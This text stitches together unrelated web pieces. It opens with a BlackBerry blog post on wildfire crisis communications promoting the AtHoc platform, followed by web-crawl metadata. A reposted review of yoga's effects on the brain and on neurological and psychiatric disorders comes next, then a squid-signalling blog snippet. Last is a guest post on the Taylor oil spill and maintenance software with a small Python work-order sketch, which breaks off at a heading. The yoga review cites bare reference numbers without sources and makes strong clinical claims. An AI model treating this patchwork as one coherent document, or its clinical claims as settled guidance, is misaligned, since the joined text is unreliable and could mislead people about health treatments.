My background also tells me something else here: In a quickly developing wildfire situation, a major obstacle to fighting the fire and evacuating homes and schools is a lack of clear and coordinated communication.
If you are a firefighter, you understand it often becomes inevitable to call in mutual aid from across the region, the country, or sometimes neighboring countries to deal with a large-scale incident.
As a first responder, I saw that one of the biggest obstacles slowing our reaction time at large-scale events was a lack of unified communications. This is particularly significant when emergency services are brought in under mutual aid. I have seen these challenges repeat themselves far too often.
How do those in emergency services combat the problem? The only way to accomplish this is through sharing timely, accurate, confirmed information. We cannot make our next move based on a social media post. Instead, we must confirm facts before we share and act on them. And speed is everything: These critical event scenes are complicated, fast-moving, and most essentially, they depend on rapid communication to save lives.
Where Crisis Communications Break Down
If you are in the emergency services or part of a major incident response team, you are likely well aware that response could often be faster if the right people had the right information, allowing them to act in a timely fashion. And communities need to be kept informed, particularly if they have had to leave their homes and take shelter at a rest center, with a relief organization such as the Red Cross, or with friends and family.
However, in many jurisdictions, police rely on one communication platform, while fire and paramedics have another, and ambulance crews yet another. This is often compounded by the traditional communication bottlenecks (telephone calls) required to bridge these gaps, further slowing the response.
For example, the incident commander might spend ten-minute chunks of time talking via telephone to individual commanders and specialists attending the scene, trying to gather the facts of the wildfire status, teams fighting it, evacuations and weather forecasts. In a wildfire or remote emergency, there are also challenges with different radio channels used by various agencies, particularly when calling for mutual aid.
All these things, and related complications, take time – the very thing we have least – in a large-scale wildfire event. And without a robust method of coordinating all communications, another critical thing is missing: a full audit trail.
It amazes me that in the 21st century and with all our various methods of communication, we still struggle to communicate effectively and efficiently. However, it doesn’t have to remain this way: Technology is changing the emergency response landscape.
Modern Critical Event Communication Strategy
Adopting an effective critical event management (CEM) communication strategy and platform frees first responders and agencies from siloed and bottlenecked communications. It also eliminates the risk of using consumer-grade apps, which some agencies attempt to rely on. I know this because I've seen professional-grade CEM systems and strategies work in practice, and I've experienced the powerful difference they make.
It works like this:
- A fire response agency declares a major incident.
- With a single alert, a command center quickly and easily notifies responders and partners of the exact location, the type of incident, hazards present, access to the scene, the number and severity of casualties, and which emergency services are on the scene.
- There is no wondering if the critical event comms went out. You know because it is a two-way system: Recipients can confirm they received the message with a single click.
- You also can instantly alert members of the public in a geofenced area around the incident. Should they shelter in place? Evacuate immediately? Watch for water-dropping aircraft?
This kind of messaging platform has applications for all types of government, education, and workplace emergencies, as well. In fact, an increasing number of agencies and departments are adopting this type of CEM platform.
Moving Forward in CEM Communications
A CEM communication platform is all about getting timely and accurate information wherever and whenever you need it, then sharing it with everyone who needs to know. I’m a firm believer in providing first responders with the best tools available, to help them do their jobs — and to allow them to help the public as efficiently, effectively, and safely as possible.
Modern CEM systems are central to that goal, and I firmly believe that as a CEM provider, we at BlackBerry are materially contributing to these efforts and helping emergency services teams across the globe save lives.
Research firm Frost & Sullivan awarded the BlackBerry® AtHoc® CEM platform with the 2021 Technology Innovation Leadership Award for Safe Cities, recognizing AtHoc as a best-in-class CEM solution. And AtHoc has jointly won, with Greater Manchester Police, two UK National Technology Awards, including Mobile Innovation of the Year 2021 and Best UK Public Sector Project in 2022. AtHoc is also StateRamp authorized in the U.S.
Learn more here or follow @AtHoc.
|
<urn:uuid:493657e8-4c2c-4975-ab98-205aa0811f75>
|
CC-MAIN-2022-40
|
https://blogs.blackberry.com/en/2022/09/trial-by-fire-what-wildfire-response-teaches-us-about-crisis-communications
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335469.40/warc/CC-MAIN-20220930113830-20220930143830-00047.warc.gz
|
en
| 0.953554 | 1,239 | 3.171875 | 3 |
Biofeedback, homeopathy, acupuncture, meditation, and yoga are among the different categories of complementary and alternative interventions. Yoga is a mind-body technique that engages both mind and body and has been used as a therapeutic intervention in various neurological and psychological disorders.
The word “Yoga” is derived from the Sanskrit origin “yuj” meaning “yoke” or “union,” and it is assumed that yoga describes the union between mind and body.
As an ancient Indian non-religious mind-body method[2,6], yoga is considered a philosophical and spiritual discipline that alleviates suffering and promotes human health.
Yoga has been practiced in Eastern cultures as a spiritual healing method for over 4000 years.
The “Yoga sutra,” a 2000-year-old guidebook, is the earliest known document of yoga that provides the framework of all branches of yoga. This book conceptualized yoga as eight limbs, which were designed to be practiced in sequence[7-9]. There are several styles of yoga, and no one is superior to another (Table 1).
Table 1 – Different types of yoga interventions
|Type of yoga||Description|
|Ashtanga||Six series of postures during breathing exercises|
|Bikram||Twenty-six poses and a sequence of two breathing exercises that take place in heated rooms with high humidity|
|Hatha||Basic postures and poses with breath regulation and meditation|
|Iyengar||Focuses on the precise structural alignment of the body|
|Jivamukti||Physically intense challenging postures with meditation|
|Kripalu||Breathing exercises at the beginning, gentle stretches, and series of poses before final relaxation|
|Kundalini||Chanting at the beginning and meditation aiming to release energy|
|Sivananda||Based on a 5-point approach, including proper breathing, diet, relaxation, exercise, and positive thinking|
|Vini||Based on in-depth training aiming to be an expert on anatomy and yoga therapy|
|Prenatal||A type of yoga helping mothers with physical training and meditation|
|Yin||Focuses on releasing tension through different joints|
A rapid increase of interest in yoga in Western countries occurred in the first decades of the 20th century, and it has continued to this day. The National Health Interview Survey has reported that the number of people in the United States who practice yoga increased dramatically among all age groups between 2002 and 2012[9,10]. Yoga practice can be a treatment for a variety of disorders as well as physical exercise.
This has led to an increase in investigations focusing on the mechanisms of action and the effects of yoga interventions on various mental and physical conditions[9-11]. Yoga interventions can maintain brain health through various mechanisms, such as the improvement of cerebral oxygenation, enhancement of neurotrophic and angiogenic factors (such as angiogenin), balancing the excitatory/inhibitory neurotransmitter equilibrium, modulation of immune responses, and prevention of oxidative stress.
In the present review, we first show data that point out the effect of yoga on the brain under physiological conditions. Then, we review the effect and potential mechanism of action of yoga in the treatment of neurological and psychological disorders.
EFFECT OF YOGA ON THE BRAIN
Yoga is a movement-based embodied contemplative activity that can lead to a variety of neurobiological alterations in different brain regions. Yoga exerts a regulatory effect on brain synaptic plasticity and promotes cognitive tasks, particularly working memory[17,18].
Furthermore, yoga increases inter-hemispheric coherence and symmetry and improves neurocognitive functions. Yoga may also exert pronounced anatomical changes in different brain regions, especially in the limbic system.
Effect of yoga on brain neurotransmitters
γ-aminobutyric acid (GABA) is considered the main inhibitory neurotransmitter responsible for the regulation of cortical excitability and neural plasticity[21,22]. Multiple lines of evidence suggest that yoga promotes cortical GABAergic inhibitory tone and modulates downstream brain regions[14,23]. A 12 wk yoga practice markedly enhanced thalamic GABA levels, accompanied by improved mood and reduced anxiety.
Higher thalamic GABA levels could be the result of enhanced (regional) cerebral blood flow in the prefrontal cortex of yoga practitioners, which can lead to the activation of the reticular nucleus of the thalamus and higher GABA production[26,27].
A magnetic resonance spectroscopy study has shown that yoga practitioners exhibited greater brain GABA levels after a 60 min session of yoga training compared to controls. In addition to GABA, an enhancement of dopamine has been observed in the ventral striatum of subjects who practice yoga[25,29,30].
It has been suggested that yoga could cause a rise in serotonin. Several investigations performed on participants after meditation sessions have shown an elevation of serotonin metabolite levels in urine[25,31]. Moreover, regular yoga practice may reduce norepinephrine levels: patients with heart failure who practiced weekly yoga displayed lower levels of norepinephrine in blood samples[30,32] (Figure 1).
Effect of yoga on the bioelectrical activities of the brain
Yoga practices regulate electroencephalogram (EEG) signals by switching off non-relevant neural circuits, preserving focused attention and blocking inappropriate signals. Studies on the effects of yoga on brain waves revealed that breathing, meditation, and posture-based yoga practice increase overall brain activity, particularly in the amygdala and the frontal cortex.
Alpha brain waves predominate during active attention and thinking as well as in some meditative conditions and correlate with basic cognitive processes. Alpha waves could reflect the physiological and pathological changes of the relevant neural network activity during conscious perception and working memory.
Investigations on brain waves in meditators concluded that meditation leads to the alterations in anterior cingulate and dorsolateral prefrontal cortices and the enhancement of alpha wave activity. Beta brain waves are dominant during wakefulness with open eyes, which could be affected by stressful conditions[37,38].
An enhancement of EEG beta wave activity has also been observed after yoga meditation practices. Beta wave activity is present throughout the motor cortex during isotonic contractions and slow movements and is related to gains in academic performance and high arithmetic calculation ability[19,40].
Theta waves assist with alertness and the ability to process information quickly. The occurrence of the higher theta wave activities is associated with lower levels of anxiety[36,41]. An increase in theta wave activity has been reported during meditation[30,36]. Longer duration of meditation is associated with higher theta and alpha wave activities[30,33,36].
Effect of yoga on brain structure and neural connectivity
Yoga intervention seems to be associated with brain structural alterations, particularly in the frontal cortex, amygdala, hippocampus, insula, and anterior cingulate cortex. An investigation on regional differences in grey matter volume associated with the practice of yoga has shown a greater grey matter volume in different areas of the dominant hemisphere, including the ventromedial orbitofrontal, ventrolateral prefrontal, and inferior temporal and parietal cortices as well as the left insula in skilled practitioners of yoga.
Furthermore, elderly yoga practitioners with several years of yoga experience have shown greater neocortical thickness in a left prefrontal cortical cluster, which includes part of the lateral middle frontal gyrus, dorsal superior frontal gyrus, and anterior superior frontal gyrus, compared to healthy non-practitioners.
A magnetic resonance imaging study revealed greater grey matter volume in the left hippocampus in skilled yoga practitioners with at least 3 years of experience compared to sex- and age-matched control subjects. A population-based study on 3742 subjects revealed a lower right amygdala volume and a lower left hippocampus volume in those who participate in meditation and yoga practices (Figure 2).
THE CLINICAL EFFECT OF YOGA
The clinical role of yoga on neurological disorders
Yoga and headaches: Several studies have suggested the beneficial effects of yoga in reducing the frequency and intensity of various forms of headaches, particularly migraine and tension headaches. Yoga has been suggested as a potential complementary therapeutic intervention for headaches. A meta-analysis on yoga for tension-type headaches and migraine has shown preliminary evidence of a short-term beneficial effect of yoga on tension-type headaches.
This study revealed a significant improvement in the frequency, duration, and intensity of pain in patients with tension-type headaches. A randomized controlled trial evaluating the beneficial effects of yoga on 114 patients with migraines has shown a significantly greater improvement in various migraine measures, including headache frequency, intensity, and use of rescue medications.
Another randomized controlled study with 19 subjects suffering from episodic migraine has shown a reduction in headache intensity, duration, depression, and anxiety as well as an improvement of self-efficacy, migraine-related disability, and quality of life from baseline to initial follow-up. A significant improvement of self-perceived pain frequency, pain intensity and duration, and psychological status as well as a reduction in medication consumption was observed in 31 patients with chronic migraine.
Furthermore, a significant decrease in headache frequency, medication intake, and stress perception has been reported in 20 patients with migraine or tension headaches. Yoga has been suggested as a potentially effective approach to reducing headaches associated with menopause.
Multiple investigations have explored the mechanisms of action of yoga on headaches. Migraine is a neurovascular disorder with significant upregulation of endothelial adhesion molecules[2,54]. It has been suggested that yoga intervention alleviates pain primarily via modulation of the pain perception system, including the anterior cingulate cortex, insula, sensory cortex, and thalamus.
A study on 42 women with migraines evaluated the effect of yoga on endothelial dysfunction in migraine patients. A 12 wk yoga training program increased oxygen delivery to the body and reduced peripheral vascular resistance, with a significant reduction in plasma levels of vascular cell adhesion molecule, which suggests an improvement of vascular function in patients with migraine[8,51,56,57]. The amplitude of the contingent negative variation, an ultra-slow neocortical event-related potential, is significantly greater in patients with migraine compared to healthy controls, which indicates higher cortical excitability. Subjects with migraines who practice meditation, including yoga, have shown significantly lower amplitude of contingent negative variation.
Yoga and Alzheimer’s disease: Alzheimer’s disease (AD) is characterized by neuronal loss, mostly in the neocortex and the hippocampus[2,60], and is associated with memory and cognitive impairments and neuropsychiatric dysfunctions[2,60]. It has been suggested that yoga exerts a beneficial impact on overall brain health in healthy elderly subjects, older people with mild cognitive dysfunction, and subjects with dementia.
Yoga practice promotes cognitive function, affective interaction, and physical abilities of the healthy elderly population and exerts a positive impact on total brain volume, neocortical grey matter thickness, and functional connectivity between different brain regions in subjects with mild cognitive dysfunction.
Using magnetic resonance imaging volumetric analysis, a trend toward decreased hippocampal volume atrophy has been observed after 8 wk of yoga practice in patients with mild cognitive dysfunction. A randomized neuroimaging study with 14 subjects has shown that yoga and mindfulness meditation may decrease hippocampal atrophy and promote functional connectivity between different brain regions, including the posterior cingulate cortex, the medial prefrontal cortex, and the hippocampus, in adults susceptible to dementia.
Furthermore, it has been shown that mind-body interventions, such as yoga, can restore cognition in persons with mild cognitive impairment and delay the onset of AD[65,66]. Elderly subjects suffering from mild to moderate dementia have exhibited an improvement of behavioral impairments after a 12 wk yoga training program. Metabolic enhancement for neurodegeneration, a novel therapeutic approach for AD, has incorporated yoga and meditation alongside other treatments of early AD pathology and achieved sustained cognitive improvement in 90% of patients. Yoga may enhance blood flow to areas of the brain that modulate memory functions, reduce neuronal injury, alleviate the symptoms of early dementia, and delay the onset of AD. Yoga can also improve physical function in patients with AD, such as walking, gait speed, and balance.
Although the mechanism of yoga action on AD needs to be elucidated, some possible mechanisms have been suggested. The serum values of several neurotrophic factors, such as brain-derived neurotrophic factor, increase after yoga practice in healthy individuals. This may also occur in patients with mild to moderate AD and exerts a neuroprotective effect on the neurodegenerative process of AD. The long-term practice of yoga also increases the serum value of serotonin.
The neuroprotective effects of yoga may be due to the enhancement of serotonin. Serotonin significantly destabilizes Aβ fibrils and protects neurons against Aβ-induced cell injury and death. Serum levels of melatonin significantly increased after a 3 mo period of yogic practices. Melatonin reduces Aβ levels and ameliorates microvessel abnormalities in the neocortex and the hippocampus in experimental AD models.
Yoga and epilepsy: The goal of therapeutic approaches for epilepsy, a common neurological disorder characterized by abnormal electrical brain activity, is to eliminate or decrease the number and duration of seizures and improve the quality of life[2,78]. Several studies suggest that yogic practices can ameliorate seizures in patients with different types of epilepsy.
An investigation on the effects of yoga intervention on seizures and EEG in 32 patients suffering from idiopathic epilepsy revealed a 62% and an 83% reduction in seizure frequency at 3 and 6 mo after the intervention, respectively. Furthermore, this study has shown a significant shift of EEG frequency from 0-8 Hz toward 8-20 Hz.
Another randomized controlled trial conducted on 20 children aged 8-12 years with epilepsy has suggested that a 6 mo yoga intervention as an additional therapy in children with epilepsy may lead to seizure freedom and a significant improvement of epileptiform EEG signals. The evaluation of the effect of yoga on clinical outcomes of 300 patients with epilepsy has suggested that yoga is a helpful approach for patients to manage their disease.
Contrary to these reports, a clinical study reported no significant difference in seizure frequency between the yoga and control groups. Nonetheless, the yoga group showed significant improvements in their quality of life. An analysis of the data of two clinical trials that evaluated the effect of yoga on 50 epileptic patients suggests a possible beneficial effect of yoga in the control of seizures.
Yoga and multiple sclerosis: Several clinical trials investigated the potential beneficial effects of yoga therapy in patients with multiple sclerosis (MS), an autoimmune neuroinflammatory demyelinating disorder of the central nervous system. A study tested the effects of a 6 mo yoga intervention on the improvement of different aspects of physical as well as psychosocial conditions in 44 patients with MS and 17 healthy relatives.
This investigation has shown significant improvements in quality of life, walking speed, fatigue, and depression scores. However, yoga did not improve the pain, balance, or physical status of these patients. A pilot study on 12 patients suffering from MS has suggested that various yoga trainings for 6 mo may lead to a significant improvement in postural balance and daily physical activities.
Another clinical study on 24 participants diagnosed with mild to moderate MS, who underwent an intensive yoga practice for more than 4 mo, has shown marked improvements in peak expiratory flow rate, physical condition, mental health, and quality of life. A study conducted on 60 female patients with MS revealed that yoga training significantly improved physical abilities and sexual satisfaction. Yogic training and relaxation have also been suggested for the improvement of neurogenic bladder dysfunction in patients with MS.
A qualitative case investigation on a woman with MS suggested that an individualized yoga intervention for 6 mo could be beneficial for the improvement of muscle tone and strength as well as self-confidence and stamina. A significant improvement in balance, gait, fatigue, walking speed, and step length has been reported in 18 patients with relapsing-remitting MS after a 12-wk yoga training. A 6 mo yoga intervention has also been reported to improve postural balance and to reduce the impact of balance impairment on daily activities in patients diagnosed with MS. A meta-analysis of 10 randomized controlled trials with overall 693 patients with MS who trained with different forms of yoga has revealed a significant improvement of fatigue but no effects on overall quality of life, sexual function, or psychosocial condition.
Yoga and Parkinson’s disease: The potential beneficial therapeutic effects of a yoga intervention for Parkinson’s disease (PD), a chronic and debilitating neurodegenerative disorder, have been investigated. Yoga exerts a range of beneficial effects on different symptoms of PD. A question-based survey on 272 patients with PD has shown that the majority of patients found yoga and meditation helpful for the alleviation of both motor and non-motor (fatigue, sleep difficulties, pain) symptoms.
A randomized clinical study on 126 patients with mild to moderate PD who underwent weekly yoga training for 8 consecutive weeks has shown a significant alleviation of psychological symptoms, improvement of quality of life, and reduction of motor symptoms. Yoga exercises can improve flexibility and balance, decrease muscle rigidity, increase the range of motion, and promote muscle strength in patients with PD. Yoga intervention effectively improved balance and proprioceptive acuity in 33 patients with mild to moderate PD. It has been suggested that incorporating yoga and occupational therapy may promote balance and decrease falls in patients with PD. Yoga training decreases back pain and postural instability, which may reduce falls in patients with PD. Furthermore, yoga as adjunctive therapy in patients with PD has been suggested as an effective treatment for the reduction of psychological complications, particularly anxiety and depression[99-101].
Yoga and neuropathy: Peripheral neuropathy is a common neurological condition due to physical nerve injury, diabetes mellitus, autoimmune disorders, malignancy, kidney failure, nutritional deficiencies, systemic disorders, and idiopathic neuropathies, which can implicate the motor, sensory, and/or autonomous peripheral nerves[102,103]. Several lines of evidence suggest that yoga may alleviate symptoms of various neuropathies[104,105].
Several reports suggest the beneficial effects of yoga practices in patients with neuropathy. Yoga practices were shown to improve numbness and weakness in lower extremities after a stretch or compression injury of the gluteal nerves, alleviate chronic pain due to diabetic neuropathy, and promote sensory functions and muscle movement in subjects with diabetic peripheral neuropathy.
However, it should be noted that some reports indicate yoga-induced nerve injury and neuropathy[109-111], particularly in patients who take sedative medications, people with benign hypermobility of their connective tissue, and the elderly[110,112,113]. Furthermore, yoga may decrease nerve compression in carpal tunnel syndrome, which could lead to the improvement of numbness after a few weeks of practice[114,115]. Yoga meditation therapy improved nerve conduction velocity, which was associated with glycemic control, in patients with diabetic neuropathy[116,117]. A reduction of the impact of chemotherapy-induced peripheral neuropathy symptoms on the lives of patients with breast cancer, as well as of pain intensity, has been reported after yoga intervention[118,119].
The clinical role of yoga in psychological disorders
Yoga, stress, and anxiety: Stress and anxiety are increasing in incidence worldwide. Approximately 34% of the general population is affected by an anxiety disorder during their lifetime. Several investigations were performed on the feasibility and potential efficacy of different forms of yoga on anxiety- and stress-induced symptoms in both children and adults. It has been suggested that yoga may promote mental and physical strength, increase stress resilience, and reduce anxiety.
Although some studies do not show any effect[122,123], most investigations indicate that yoga can be effective in the alleviation of anxiety in the form of monotherapy or adjunctive therapy[124-127]. Functional magnetic resonance imaging evaluation revealed that yoga interventions modulate the activity of various brain areas that are crucial to emotion regulation, such as the superior parietal lobule and supramarginal gyrus, and lead to a diminished sympathetic response to stressful emotional stimulations.
Training in mindfulness- and yoga-based programs has shown a significant reduction of anxiety symptoms, which was associated with a marked decrease in structural connectivity of the right amygdala. Furthermore, it has been suggested that yoga intervention modulates stress-induced autonomic regulatory reflexes and inhibits the production of adrenocorticotropic hormone from the anterior pituitary gland, resulting in decreased production of cortisol from the adrenal gland.
A meta-analysis revealed that more yoga practice was accompanied by greater benefits, particularly for subjects suffering from higher levels of anxiety at baseline. Another meta-analysis of eight trials with 319 adults diagnosed with anxiety disorders who underwent yoga training indicates that yoga could be a safe and effective intervention to reduce the intensity of anxiety. Rhythmic yoga meditative interventions resulted in a reduction of stress associated with higher plasma dopamine levels in 67 healthy subjects who regularly engaged in mind-body training. Enhancement of dopamine levels following yoga practice leads to a suppression of corticostriatal glutamatergic transmission and regulation of conscious states. Yoga interventions have been suggested to enhance vigilance, improve sleep, and reduce anxiety in healthy security personnel.
Yoga-based exercises in schools have been suggested to reduce stress and challenging behavioral and cognitive responses to stress, promote physical ability, and strengthen cognitive performance among students[136,137]. Yoga interventions for a period of 8 wk have shown a significant impact on reducing anxiety in school-age children. Using a yoga-based relaxation method (mind-sound resonance technique) alleviated state anxiety and mind wandering and promoted state mindfulness and performance in school children.
High-frequency yoga breathing training promotes attention and reduces anxiety in students aged 11-12 years. Furthermore, evaluation of the effect of yoga intervention on stress perception and anxiety levels in college students has shown a significant reduction in anxiety and stress scores associated with a marked enhancement of total mindfulness. Yoga can also help adolescents hospitalized in an acute care psychiatric ward to lessen their emotional distress. Yoga exerts a twofold effect in orphanage residents, reducing anxiety and improving self-esteem.
Practicing yoga in patients suffering from post-traumatic stress disorder for at least 4 wk resulted in a significant reduction of cortisol values. Yoga practices significantly reduce stress and anxiety in subjects living with human immunodeficiency virus, people with cancer, such as survivors of lung cancer and patients with breast cancer, patients with systemic disease, like rheumatoid arthritis[149,150], and patients with neurologic disorders, such as PD. Yoga exercises have also been suggested as a promising stress-relieving approach in pregnant women[151,152], in women receiving treatment for infertility, and in women who are trying to quit smoking[154,155].
Yoga and depression: Depression is the most common psychiatric disorder that affects 25% of women and 12% of men during their lifetime[156-159]. This disorder is commonly treated by antidepressants and psychotherapy[156,160]. Yoga interventions have been suggested as effective adjuvant therapy[161,162] as well as monotherapy for depression.
A narrative review on the efficacy of yoga and mindfulness as an adjuvant treatment in severe mental illnesses including major depressive disorder (MDD) indicated that both yoga and mindfulness have significant and beneficial effects on reducing the severity of depressive symptoms.
Yoga practices in combination with conventional antidepressants significantly improved depression symptoms and increased the remission rate in patients with MDD compared to control patients. A significant decrease in self-reported symptoms of depression after practicing yoga has been observed in individuals aged 18-29 with mild levels of depression. A meta-analysis has shown that yoga produced a greater reduction in depression than psychoeducation.
In addition to the improvement of depression, yoga interventions promote mental health and quality of life and interrupt negative thinking in patients with depression[168,169]. A meta-analysis of 10 studies has shown that yoga practices have a statistically significant effect as an adjunct treatment in patients with MDD.
In an investigation of hospitalized patients with severe MDD, the effect of yoga intervention was equivalent to treatment with a tricyclic antidepressant. It has been suggested that yoga modulates cortical inhibition via the regulation of the GABAergic system and exerts beneficial effects in MDD.
Furthermore, increased GABA-mediated neurotransmission, measured by transcranial magnetic stimulation after multiple yoga therapy sessions, was associated with a significant improvement of depression symptoms in patients with MDD. Enhancement of thalamic GABA levels has also been suggested as a potential mechanism for the improvement of mood in patients with MDD.
Enhancement of serum neurotrophic factors, such as brain-derived neurotrophic factor, in patients with MDD who practiced yoga, pointed to the possible role of increased neuroplasticity in the improvement of depression symptoms. Yoga practices in post-menopausal women resulted in reduced values of follicle-stimulating hormone and luteinizing hormone, which was associated with decreased stress levels and depression symptoms as well as improved quality of life. Yoga practices in association with coherent breathing intervention have been shown to resolve suicidal ideation in patients with MDD[9,176].
Yoga and bipolar affective disorder: Bipolar affective disorder (BD) is a chronic illness with recurrent episodes of manic or depressive symptoms[177,178]. Although most patients with BD are free of symptoms during remission, many of them continue to experience mild symptoms and suffer from functional behavior impairments[177,179]. Studies on the role of yoga in the treatment of BD are scarce. However, some studies have recommended yoga as a specific self-management strategy for BD[5,180].
Patients with BD have shown a significant alleviation of depression and anxiety symptoms, reduction in difficulties with emotion regulation, and improvement of mindfulness skills during the remission phase following several weeks of yoga practices. Yoga interventions have been suggested to decrease negative emotions in patients with BD. Yoga has also been suggested as an adjuvant therapy that improves residual depression symptoms as well as manic symptom severity of patients with BD. An extensive multicenter, randomized controlled study on 160 adults with BD has shown that mindfulness-based cognitive therapy, including yoga practices, improves the severity of manic symptoms and anxiety, promotes mental health and overall functioning, and reduces relapse rates.
Yoga and schizophrenia: Schizophrenia (SZ) is a severe mental disorder that often manifests through positive symptoms, including hallucinatory experiences and delusional beliefs, and negative symptoms, such as lack of motivation and social contact, absence of spontaneous speech, and affective flattening[186-188]. A growing body of evidence suggests that yoga training as an add-on therapy could improve both the negative and positive symptoms of SZ and promote cognitive function and emotional recognition[189-194].
The analysis of yoga intervention effects on the mood of 113 patients with psychosis has revealed significant improvements in tension-anxiety, depression, anger, fatigue, and confusion. Another study on 66 antipsychotic-stabilized patients with SZ has revealed a significant improvement in positive and negative symptoms, socio-occupational functioning, and performance following yoga training.
A meta-analysis of 13 investigations with 1159 patients found that the frequency of yoga interventions was associated with improvement of positive symptoms, while the duration of each session was associated with alleviation of negative symptoms in patients with SZ. Yoga practice in patients with SZ who were taking antipsychotic medications and were in a stable condition significantly decreased drug-induced parkinsonian symptoms and improved executive function and negative symptoms. Long-term yoga intervention in patients with SZ resulted in greater social and occupational functioning and improved quality of life.
Yoga training in patients with SZ resulted in an improvement of negative and positive symptoms, associated with a reduction of paranoid beliefs and improved quality of life. Yoga as an add-on treatment has shown a greater improvement of the negative symptoms of SZ in comparison to physical exercise therapy. Furthermore, yoga therapy led to a significant reduction in burden scores and an improvement in quality of life among patients with psychosis. Yoga intervention in patients with SZ significantly improved cognitive dysfunction, presumably through the correction of autonomic dysfunction[200,201].
It has been suggested that yoga may improve SZ symptoms by strengthening the synaptic network of the lateral and medial prefrontal areas and augmentation of the premotor and parietal mirror neuron circuitry. Oxytocin values increased significantly following yoga practice; an effect that has been suggested to play a potential role in the improvement of social cognition after yoga intervention in patients with SZ. Yoga practice in patients with SZ was also associated with a significant decrease in blood cortisol levels, suggesting a beneficial effect of yoga in the reduction of sociophysical stress of patients.
Yoga and other psychological disorders: Several other studies indicate the potential beneficial effects of yoga practices on other psychological disorders and syndromes, such as obsessive-compulsive disorder (OCD), burnout, somatoform disorders, and hypochondriasis. Treating OCD with yoga in combination with pharmacological interventions improved the obsessive thoughts and compulsive behavior of patients[206,207].
Furthermore, several clinical trials have suggested the promise of yoga intervention as an adjunct therapy for patients with OCD who were unresponsive to conventional treatments[208,209]. Moreover, yoga training enhanced general satisfaction, reduced work exhaustion, and led to greater work engagement and empathy among teachers, nurses, hospice professionals, and physicians[213,214] who were suffering from job burnout. Yoga can promote the psychological and physical well-being of subjects with burnout, particularly when combined with other activities, such as art and music therapy[215,216].
Furthermore, yoga-based interventions have been recommended as an effective therapeutic approach in somatoform disorders. A 6 mo trial of yoga practices led to a significant improvement of somatoform symptoms, such as gastrointestinal, cardiovascular, and urogenital symptoms, in women with menstrual disorders. Several studies have revealed the beneficial effects of yoga interventions on the psychological health of the population during the global pandemic of coronavirus disease 2019.
Reference: doi:10.5498/wjp.v11.i10.754
Source: https://debuglies.com/2021/11/09/neuropsychological-disorders-therapeutic-role-of-yoga/
The jumbo flying squid (Dosidicus gigas) uses its ability to change color as a language. In 2020, marine biologists discovered that these squid are surprisingly coordinated: despite being very numerous, they rarely collided or competed for the same prey. Scientists have hypothesized that the shimmering pigments allow the squid to quickly transmit complex messages, such as when one is preparing to attack or when a prey item is already being targeted. The researchers noted that the squid showed 12 different pigmentation patterns in different sequences, similar to how humans arrange words in a sentence.
For example, the squid went dark while chasing prey and then switched to a half-light/half-dark pattern just before the attack. The researchers suggested that these pigmentation changes signal a specific action, such as "I'm about to attack." Even more interesting (or worrying), the researchers also believe that the squid uses subtle pigment changes to provide more context to the action.
Source: https://keepnetlabs.com/friday-squid-blogging-the-language-of-the-jumbo-flying-squid/
Guest Post by Kelly Potter of Transcendent.ai
In 2010, the Deepwater Horizon oil tragedy struck and took the nation’s attention for months.
Two hundred million gallons of oil spilled across 16,000 miles of coastline from Florida to Texas, 8,000 animals were killed, and 11 workers died in the explosion. Communities around the Gulf of Mexico came to a halt, but lurking underneath this disaster was an older spill spewing from an oil platform that was damaged six years earlier.
CNN recently reported “The Taylor oil spill is still surging after all this time; dumping what’s believed to be tens of thousands of gallons into the Gulf per day since 2004.”
By some estimates, the chronic leak could soon be larger, cumulatively, than the Deepwater disaster. That would also make the Taylor spill one of the largest offshore environmental disasters in U.S. history.
In September, the Department of Justice submitted an independent study into the nature and volume of the spill that claims previous evaluations of the damage, submitted by the platform’s owner Taylor Energy Co. and compiled by the Coast Guard, significantly underestimated the amount of oil being let loose.
According to the filing, "the Taylor spill is spewing anywhere from 10,000 to 30,000 gallons of oil a day."
As for how much oil has been leaked since the beginning of the spill, it’s hard to say. An estimate from SkyTruth, a satellite organization, put the total at “855,000 to 4 million gallons by the end of 2017. If you do the math from the DOJ’s filing, the number comes out astronomically higher: More than 153 million gallons over 14 years.”
It’s still unclear how the Taylor oil spill is being addressed by officials regarding an action plan for cleanup, current and future prevention, and ways to better detect these incidents occur.
So the questions become:
- How can we continue to grow and learn from these incidents?
- What new technologies are out there to enhance detection?
- What preventive measures should the oil industry be implementing that aren’t currently in place?
5 Preventive Measures Currently in the Oil Industry
Since the BP oil spill, several preventive maintenance measures have been put in place for the oil industry; these measures should be coupled with an effective maintenance management system to allow managers to track & monitor asset functionality, locate work history, and plan for replacement/repair on said assets based on operating capabilities.
Preventive maintenance steps being performed today:
- Stress tests performed to assess accuracy and tracking through management documentation
- Better documentation of work orders and training crew members on new practices
- Blueprint creation: allows users to use existing technology to respond quickly to oil spills and better assess the situation
- New equipment that allows rigs to communicate with plans and ships more freely and coordinate response efforts to future spills
- Remotely operated vehicles: robots that assist crew members as backup in disaster situations
These measures coupled with an EAM CMMS solution can help managers and engineers execute tasks properly and efficiently. Engineers have the ability to complete work orders, work requests, and inspections all from their mobile phone with a proper EAM CMMS solution. This eliminates the need for paper trails and gives managers a more accurate look at the work completed and gets problems resolved in real-time.
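To make the CMMS idea concrete, here is a minimal sketch of how a work order might be represented so that completion status and work history stay queryable. It is illustrative only: the `WorkOrder` class and its field names are invented for this example and are not taken from any particular EAM CMMS product.

```python
from dataclasses import dataclass, field
from datetime import datetime
from typing import List

@dataclass
class WorkOrder:
    """One maintenance task tracked against a specific asset (e.g., a pump or valve)."""
    asset_id: str
    description: str
    priority: str = "routine"          # e.g., "routine", "urgent", "safety-critical"
    opened: datetime = field(default_factory=datetime.utcnow)
    history: List[str] = field(default_factory=list)
    closed: bool = False

    def log(self, note: str) -> None:
        """Append a timestamped note so managers can see work history in real time."""
        self.history.append(f"{datetime.utcnow().isoformat()} {note}")

    def complete(self, note: str = "work verified") -> None:
        self.log(note)
        self.closed = True

# Example: an engineer closes out an inspection from the field.
wo = WorkOrder(asset_id="pumpjack-17", description="Quarterly seal inspection")
wo.log("Inspection started")
wo.complete("Seals within tolerance")
print(wo.closed, len(wo.history))
```

A real system would persist these records and sync them from mobile clients, but the core idea (every action appended to an auditable history) is the same.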
However, over the last nine years, technology has advanced in areas such as IoT, Augmented Reality, Virtual Reality, and even drone maintenance. It is said that by 2020 "approximately 50 billion machines will be connected to the internet," making it easier for technology to guide the way engineers and workers interact and do their jobs on a day-to-day basis.
The oil industry could benefit from new innovations in the IoT realm in regards to underwater communication systems.
Internet of Things and Underwater Communications
